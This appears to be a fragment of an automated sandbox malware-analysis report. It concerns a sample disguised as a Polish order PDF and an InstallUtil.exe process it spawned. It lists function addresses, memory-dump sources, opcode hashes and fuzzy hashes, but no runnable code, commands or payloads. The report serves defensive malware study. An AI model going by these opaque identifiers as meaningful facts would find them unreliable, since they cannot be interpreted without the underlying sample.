Instruction Fuzzy Hash: 7311D770914A19CFEB64EF19DC586E8B7F1EBD4312F1441E9800ED6191EB346E85CF45

Function 00007FF7C814412C Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

8C%, xrefs: 00007FF7C814412D

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID: 8C%
API String ID: 0-3953692515
Opcode ID: 1cd21ec095d59de4a62e74cdb88aae484d2ce6afae3af8eccd82512f0a35ddf3
Instruction ID: 472d915ae2082c02c1b12ae2c3e9b932ac2617aa2386f210919329bf00f86ecf
Opcode Fuzzy Hash: 1cd21ec095d59de4a62e74cdb88aae484d2ce6afae3af8eccd82512f0a35ddf3
Instruction Fuzzy Hash: DCF0AC20A0D9850FE700AFA898C42F9F7E0FBA5722F48417AC00AC72EBDD2D2404C314

Function 00007FF7C824597C Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a29d83d76507b43022fcc459a151e6c147b62e99ed4ed2a26c0881cd67fb90
Instruction ID: 37ff4b37af33419aa9dfce995b6f56fb421a45fa3a57b98f2a8fe701f89b20e2
Opcode Fuzzy Hash: 71a29d83d76507b43022fcc459a151e6c147b62e99ed4ed2a26c0881cd67fb90
Instruction Fuzzy Hash: BD02F974A0891E9FDB94EF58C5497ADF7B1FF98311F944276C00DE3681CB38A8918BA4

Function 00007FF7C8159660 Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be26f52b973ed969637f41de27c2707eab49349097083cf8d70b8a8ce50dca7
Instruction ID: a57f2f16e81c4fe9ecbb7a29aac793ac3b5894f54adc3717e1e2d2e6b16e9aeb
Opcode Fuzzy Hash: 3be26f52b973ed969637f41de27c2707eab49349097083cf8d70b8a8ce50dca7
Instruction Fuzzy Hash: 1A129770908A198FDBA9EF18D895BA9B7F5FB59700F5001E9D00DE7261CB35AE81CF04

Function 00007FF7C82463BD Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544db351fe9ac3c9ffd16c190e925ec4fc72f0646a740c059caedc0f30a8ea31
Instruction ID: 3f769c7a29582aa1981558c1e9e1e903bef10a63cc22e61d77e4340f7b79c742
Opcode Fuzzy Hash: 544db351fe9ac3c9ffd16c190e925ec4fc72f0646a740c059caedc0f30a8ea31
Instruction Fuzzy Hash: AF12177090861ECFEB94EF68C459BADF7B1FF59311F94017AD009A7292CB396881CB64

Function 00007FF7C81424BB Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00471135fc142fe01d121c23dd85b812fd818f71c9f81285676154d8e9f109ce
Instruction ID: 0cedf9de163e7367239859b5a552e057574494781d0cea8b504d4c965b5d997c
Opcode Fuzzy Hash: 00471135fc142fe01d121c23dd85b812fd818f71c9f81285676154d8e9f109ce
Instruction Fuzzy Hash: A6A1116280E7C15FE7039B7468755A0BFB0AF57224B4E04EBC4C5CF0A3E508AA5AD362

Function 00007FF7C8145494 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d8e0658a7c641af09bbf88175e75a13dd673cc0ea042e30045c9822314494a
Instruction ID: 5feb3d0945a504344500292d04d8c6922df6fc1e59ec387db1c776e8518fcde3
Opcode Fuzzy Hash: 76d8e0658a7c641af09bbf88175e75a13dd673cc0ea042e30045c9822314494a
Instruction Fuzzy Hash: 9581DA61D0CA898FE755EB68A8197E9BFE1EFA6310F4801FED048CB1D3DA681445C761

Function 00007FF7C81439F5 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf55c22642b8babe1020e6b31b6fdb81ce210e6f1d56ea42fd0f1584804fc9c6
Instruction ID: ddee4d6e7b5bced8e3e7259cffc1fec62f94484d084d67ad5f16f2480f929af3
Opcode Fuzzy Hash: bf55c22642b8babe1020e6b31b6fdb81ce210e6f1d56ea42fd0f1584804fc9c6
Instruction Fuzzy Hash: 65519C30908B5C8FDB58EF98D8466EDBBF1FB99310F04826BD449D7252CA30A845CBC2

Function 00007FF7C814474D Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d2be579a59f4f2116cc1a5e05eebfffe6995e748a6f3e741379ca1df09b56a7
Instruction ID: 97d7a485b18e3e26eb37909b6d561847fbcc893b195880982c3281b8ffb569ba
Opcode Fuzzy Hash: 8d2be579a59f4f2116cc1a5e05eebfffe6995e748a6f3e741379ca1df09b56a7
Instruction Fuzzy Hash: A5514A21A0DAC60FE745A769A8553A9FBD1EFC6360F4901BBC00CCB1C3DE1CA886C361

Function 00007FF7C8245A09 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d435f0f2eb22193090294eb97538c1699b64c4d2e926e1af213e241eb5465c7a
Instruction ID: 41d7d86d7e1081a776a6e2f2a061cde7fcda86fd72bfbae4c6e21b873eac4a1d
Opcode Fuzzy Hash: d435f0f2eb22193090294eb97538c1699b64c4d2e926e1af213e241eb5465c7a
Instruction Fuzzy Hash: DC411A7090861ACFEBA4EF58C5497BDF7B1FF98311F94417AD04DA2191CB386981CBA4

Function 00007FF7C81427A9 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a673145b060fb18986665556a677abb2cc9247ba0f3144c48a3f102b0667ca57
Instruction ID: ce7ef99e381813dd2e73c9c91df236c4d6b029eb52bfc88d51fb28cdbce050e8
Opcode Fuzzy Hash: a673145b060fb18986665556a677abb2cc9247ba0f3144c48a3f102b0667ca57
Instruction Fuzzy Hash: 5C31F36190DBC64FD346AB3488943A5FFE0EF96310F0842FFC049CB193DA28A895C351

Function 00007FF7C8144EC5 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16f4697ade75d14f60f2f3eb9203e7906bf1bce8b0cba2362510b5b74044006
Instruction ID: 3a1018d09957a60604843e6dee134e045e44fded90f80e470a97f3b322b9da28
Opcode Fuzzy Hash: c16f4697ade75d14f60f2f3eb9203e7906bf1bce8b0cba2362510b5b74044006
Instruction Fuzzy Hash: ED310C21A0D5594FD711BB3DA4652FEBFA0EFC2335F4804BAD149DA183D919644DC3A4

Function 00007FF7C8144F10 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9bb055e6e04229ef2236af5eeab50651e168279ffad53fd36159b65cc205f56
Instruction ID: 2debfb6f3f1d6b515640d2e98a60ec1bc9ecd154a99bdb5f2a70f1c5b1f6ccba
Opcode Fuzzy Hash: f9bb055e6e04229ef2236af5eeab50651e168279ffad53fd36159b65cc205f56
Instruction Fuzzy Hash: 2231EA25A0D6594FD711EB3DA4652FEBFA0EFC2335F4800BAD148DA183D915644DC3A5

Function 00007FF7C8142C3B Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57b890b9021486c89901ddb67e0793848f9dc02c6821f9284d446f130f55a965
Instruction ID: b037fcb95a2e87e7eda86137661ba0adbfb901706e9d89472c9c7c64bde05ee5
Opcode Fuzzy Hash: 57b890b9021486c89901ddb67e0793848f9dc02c6821f9284d446f130f55a965
Instruction Fuzzy Hash: AC31A230A089464FE7A5EF288454768FBE2EF95360F5C41BDD04AC72D6DA68E885C351

Function 00007FF7C8245A92 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc32b238cb7664ffaa82445d3e49e42d33517758213806b67195ee0862d4d37b
Instruction ID: d3d22c8208548086f916441902a32480a589dc6b160ccd4edc4e47e8edc9f8f5
Opcode Fuzzy Hash: dc32b238cb7664ffaa82445d3e49e42d33517758213806b67195ee0862d4d37b
Instruction Fuzzy Hash: 23319570E1491E9FDB94EF58C449BADF7B1FF98311F504166D00DE3295CB38A8828BA4

Function 00007FF7C8245EFA Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e94c6a3bde30bd872a300c09ef12788ce3a1b8e5c7401aee3547629f857e4c5
Instruction ID: 6ac35b352d2c07b1dcff68508cbb02b14843d7eeafdfe5a5d65b6066f72f259a
Opcode Fuzzy Hash: 4e94c6a3bde30bd872a300c09ef12788ce3a1b8e5c7401aee3547629f857e4c5
Instruction Fuzzy Hash: 5431FF70A0451E9FDB94EF58C449BA9F7B1FF58311F5052AAC00DE3252DB38A985CBA4

Function 00007FF7C8245E0E Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36ae4d8497acf95ab2017a99be4d950a0df5e87e7c97a10f0c3de41e2af3ac9e
Instruction ID: 3344245e89405b57bfadd78e10b3a32f35fbf477c9e66c10803c1ee54ab6fb22
Opcode Fuzzy Hash: 36ae4d8497acf95ab2017a99be4d950a0df5e87e7c97a10f0c3de41e2af3ac9e
Instruction Fuzzy Hash: DE214D70E0451E8FEB94EF58C4497A9F7B1FF58311F9042BAC04DE3142CB38A9868BA4

Function 00007FF7C8142A79 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acf8f76bfa61a151a2fd4a7dd27cb20a156073b9ee8901511394ac88d5437464
Instruction ID: 1002050babd4e3ebd46da920dce8dc10ef6197f91d0857a938c02b1d7bd8c5e8
Opcode Fuzzy Hash: acf8f76bfa61a151a2fd4a7dd27cb20a156073b9ee8901511394ac88d5437464
Instruction Fuzzy Hash: 44212971A089868FE759EF28945D3B9BBD2FFD9361F18017DC04EC7283EE28584A8751

Function 00007FF7C8245E45 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2933c218f183aa5d0076e20eab1bb6002c0e8e9f235865d11ca510376c4e1c9
Instruction ID: 4877c6c24250cf48d8da8ff8c7c3df006db2f13d6f5c54e5981fc788dc7edb83
Opcode Fuzzy Hash: f2933c218f183aa5d0076e20eab1bb6002c0e8e9f235865d11ca510376c4e1c9
Instruction Fuzzy Hash: 6C21AB74E0891D9FEB94EF58C4497ADF7B1FFA8311F905266C04DE3245CB38A9818BA4

Function 00007FF7C8145285 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85541f5310f6b383545164ec3d7e357c7a15becdc3723e482f63091fd0baf5e3
Instruction ID: a616edf7ddf2872d003a4759301405b51a29fdf95bebf5d6a3ad8daedca188cf
Opcode Fuzzy Hash: 85541f5310f6b383545164ec3d7e357c7a15becdc3723e482f63091fd0baf5e3
Instruction Fuzzy Hash: 4721927090D2968FEB01FF74D8652EDFBE0BF46314F4805BAD0499A183DB786548CB95

Function 00007FF7C8245F47 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ecaefc0be89f5d9cecb7df3de0dfd753f1bbcda56fed3152608ab47e8cfbd89
Instruction ID: bfb2dd2c40e67e8b43007dd08a5db880cb31d96acbbf77d346a3a200d73c6b87
Opcode Fuzzy Hash: 9ecaefc0be89f5d9cecb7df3de0dfd753f1bbcda56fed3152608ab47e8cfbd89
Instruction Fuzzy Hash: D321B870E0491E8FDB94EF58C4497E9F7B1FF98311F5052A6C00DE3295CB38A9858BA4

Function 00007FF7C8144F68 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fa9744717138f5cb0c4977fdc4ae4b560d613c7c290e1bd7e138ed731a9b455
Instruction ID: 74ea728fb78614215a512be36d719748a433b46b36ae5d6d80a79539dbc6157e
Opcode Fuzzy Hash: 7fa9744717138f5cb0c4977fdc4ae4b560d613c7c290e1bd7e138ed731a9b455
Instruction Fuzzy Hash: 3811D630A0C6498FDB55EF3894552FEBFE1EF96321F4800BED049E6182CA296848C7A5

Function 00007FF7C8145FD2 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e686d3268600b13a02e73562601743e8ec9d50ba48caf4cd37b22f1bc09d32
Instruction ID: 564a88b66bdd2afece9d119c49c4fbe40cc40fb9a91aef6580ff061b79f313cd
Opcode Fuzzy Hash: a7e686d3268600b13a02e73562601743e8ec9d50ba48caf4cd37b22f1bc09d32
Instruction Fuzzy Hash: 58111C709056198BEB28EF15D858BE8F7F4EB95311F6441ADD04EA22C1EA382A85CF19

Function 00007FF7C8245A4D Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe5e334417563402339cb6db92f406ecd4cceedd52b9e5df831e21ae80ebb7b2
Instruction ID: 1a2fa8a883b4a03235eae75995e20e6a9b5fb2b43008e0b5f4f3d3772ac44cff
Opcode Fuzzy Hash: fe5e334417563402339cb6db92f406ecd4cceedd52b9e5df831e21ae80ebb7b2
Instruction Fuzzy Hash: B2019770E0851E8FEB94EF58C4497ADF7B1FF98311F945276C00DE2281CB3869858BA4

Function 00007FF7C8246891 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1621249045.00007FF7C8240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8240000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d0ea4dbdc6b11272e29733068ce7bbc323c9430cca3ec406381a509acf3753f
Instruction ID: 8980af75e5da7a25c83cf81f8a45f859d733a8ef2da38e50be2021ce620f4ce8
Opcode Fuzzy Hash: 0d0ea4dbdc6b11272e29733068ce7bbc323c9430cca3ec406381a509acf3753f
Instruction Fuzzy Hash: F711E37090561DCFDB94EF64C444BECF7B1FF49311F9001A9D009A2291CB396D81CB68

Function 00007FF7C8147919 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f7bd016b456b62b6212186030e2f744ac65ae87ac59aa0781ad86115469ea5
Instruction ID: a0180e97c94679a179bef6124edcdd12a6f55be7cde4689a223f79cf14b1b531
Opcode Fuzzy Hash: 31f7bd016b456b62b6212186030e2f744ac65ae87ac59aa0781ad86115469ea5
Instruction Fuzzy Hash: F1115B3090462C8FEB28EF50DC587E9F7F1EF90715F6401EE800A96191EE786A81CFA5

Function 00007FF7C81428F8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53145adb828bb4d783ef6303d43e0f619482c81730093e5852a4a9d840d98274
Instruction ID: 413b017a482433de60f07ba42e5adf3ae8952f7d18a75a794572a69b4f73d7ff
Opcode Fuzzy Hash: 53145adb828bb4d783ef6303d43e0f619482c81730093e5852a4a9d840d98274
Instruction Fuzzy Hash: 04F02EE190DE995FD785A73818493E9BBE0FF65221F08016BD40DC3142E9145855C351

Function 00007FF7C81445FD Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c3f264f1b6cc194bc1e7223436a0956a83760ddb1f4eaf738a3320df2fe2268
Instruction ID: 78eea7341f5ace79f7e03563e6891be67dd3bff75055c5ee108d7a2ea346ce1f
Opcode Fuzzy Hash: 6c3f264f1b6cc194bc1e7223436a0956a83760ddb1f4eaf738a3320df2fe2268
Instruction Fuzzy Hash: BFF06770809A0D8BEB40FF29B8086EEF7E0EB98711F50013AE80CC2190EA30A194CB94

Function 00007FF7C81408A9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed21ec15be8b1a4849779a90159ace37b0393f9d72a90b18887a6fab295fb42
Instruction ID: 168b025ad943453544363fefd150aed9354b55681174590c0465bb481cc7d779
Opcode Fuzzy Hash: 2ed21ec15be8b1a4849779a90159ace37b0393f9d72a90b18887a6fab295fb42
Instruction Fuzzy Hash: A5F039A244E3C45FCB039B709C61194BF70BE03104B4E02CBC5C4CA4A3E6199A1EC363

Function 00007FF7C8144620 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f7ebd172a80843b72616f73502f38257659759fcbdc7736f92598beddfa6ec5
Instruction ID: ef9d8f531f427b68d5cb09ff9fb13a0cf7268f6f6a56b90301f9a99cbc594010
Opcode Fuzzy Hash: 7f7ebd172a80843b72616f73502f38257659759fcbdc7736f92598beddfa6ec5
Instruction Fuzzy Hash: 02F01C70818A0D9FEB80EF68E8496EEBBE0FF58315F50457AE81CC2150DA30A5A4CB81

Function 00007FF7C8144A68 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e4ea4e13925bbdb46d3cec887cc72d7f60a4085b512177dcbf70562b367c3b9
Instruction ID: d2955e88f581d50ca05723913206e5edaf1a7d2344f69e454c95ed87c4906e65
Opcode Fuzzy Hash: 0e4ea4e13925bbdb46d3cec887cc72d7f60a4085b512177dcbf70562b367c3b9
Instruction Fuzzy Hash: 7CE0EC7020DA868FD749DB2CD499719BBE1EF5A310F1642DAA09ACF2A3C66598818701

Function 00007FF7C8142948 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf3202c278e08d684987fb0465322914ee07aecc4c9770a7dea00be9bef9dd32
Instruction ID: a94b788675c35608ef8b1e31184d972f3f94f466325cf23aa4dd308d50a8c214
Opcode Fuzzy Hash: cf3202c278e08d684987fb0465322914ee07aecc4c9770a7dea00be9bef9dd32
Instruction Fuzzy Hash: 63D01212B1880D0F5B94B69D78552FDE382EBC81A6F50407BD10EC2186DD2458164681

Function 00007FF7C814603F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1620390522.00007FF7C8140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c8140000_zam#U00f3wienie 12832025_pdf .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918bd96304f69368001d10f2568d740c682ca59b3bdcc28ee24189c5af0f48a4
Instruction ID: e24cb321ad1a99df201b92c09368a68b04d014267036349aa52fb7d3e46a7dec
Opcode Fuzzy Hash: 918bd96304f69368001d10f2568d740c682ca59b3bdcc28ee24189c5af0f48a4
Instruction Fuzzy Hash: A5E01A70D0469A8BDBA4DE04D944694B7E1FB98710F5441A9900CD3245EB745D818F44

Analysis Process: InstallUtil.exePID: 5604, Parent PID: 3084COMMON

Executed Functions

Function 00007FF7C8172282 Relevance: 2.7, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

x6#:, xrefs: 00007FF7C8172455
x6#:, xrefs: 00007FF7C8172429

Memory Dump Source

Source File: 00000002.00000002.2550043207.00007FF7C8170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c8170000_InstallUtil.jbxd

Similarity

API ID:
String ID: x6#:$x6#:
API String ID: 0-2012028437
Opcode ID: a7b2749ba11c40ab37ab16c33a13075127d05f960fd3d7a5fb84678123a4357b
Instruction ID: 1f9058f2a68a3008eeb4083c21e7366a27e33f126e719f1fd13010a49cb40c2a
Opcode Fuzzy Hash: a7b2749ba11c40ab37ab16c33a13075127d05f960fd3d7a5fb84678123a4357b
Instruction Fuzzy Hash: 3E71117090DA8C9FDB55EBA8D455AACFFF1FF5A310F4504ADD049D7252DA64A881CB00

Function 00007FF7C8170CE5 Relevance: 2.6, Strings: 2, Instructions: 126COMMON

Download Yara Rule

Strings

[#:d, xrefs: 00007FF7C8170DBF
x6#:, xrefs: 00007FF7C8170D95

Memory Dump Source

Source File: 00000002.00000002.2550043207.00007FF7C8170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c8170000_InstallUtil.jbxd

Similarity

API ID:
String ID: [#:d$x6#:
API String ID: 0-1007169446
Opcode ID: 98b2e421828b9405f262403dd77137867417574887aac2f7c8292ac640ad887c
Instruction ID: fa476248fe3c5b6ade87c052015a4e837781839383b8ae0108d18c33e5983fc4
Opcode Fuzzy Hash: 98b2e421828b9405f262403dd77137867417574887aac2f7c8292ac640ad887c
Instruction Fuzzy Hash: B441CDA190E9C94FE3129B6858B94E9FFF1DF0F21074D09EEC4899B597C9182813D704

Function 00007FF7C8170B0D Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

@[#:, xrefs: 00007FF7C8170BE2

Memory Dump Source

